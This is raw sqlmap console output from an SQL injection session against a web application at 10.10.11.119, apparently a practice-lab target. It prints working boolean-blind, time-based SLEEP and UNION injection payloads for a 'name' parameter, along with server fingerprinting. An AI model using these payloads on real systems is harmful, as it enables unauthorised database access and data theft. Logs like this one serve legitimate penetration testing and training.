        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:43:40 /2022-03-24/

[10:43:40] [INFO] resuming back-end DBMS 'mysql' 
[10:43:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: name=admin') AND 5048=5048 AND ('DSTg'='DSTg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=admin') AND (SELECT 5900 FROM (SELECT(SLEEP(5)))VdWE) AND ('oDmL'='oDmL

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: name=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b6a71,0x43445972435844707479665054784f53446c414455726f5a75765766545a536756594b6b6e62785a,0x7162717071)-- -
---
[10:43:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:43:41] [INFO] fetching columns for table 'SESSION_STATUS' in database 'information_schema'
[10:43:41] [INFO] fetching entries for table 'SESSION_STATUS' in database 'information_schema'
[10:43:42] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[10:43:42] [WARNING] the SQL query provided does not return any output
[10:43:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:43:42] [INFO] fetching number of entries for table 'SESSION_STATUS' in database 'information_schema'
[10:43:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[10:43:42] [INFO] retrieved: [10:43:42] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases


[10:43:43] [INFO] retrieved: [10:43:43] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[10:43:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 

[10:43:49] [WARNING] unable to retrieve the number of entries for table 'SESSION_STATUS' in database 'information_schema'
[10:43:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[10:43:49] [INFO] fetched data logged to text files under '/home/nn/.local/share/sqlmap/output/10.10.11.119'

[*] ending @ 10:43:49 /2022-03-24/

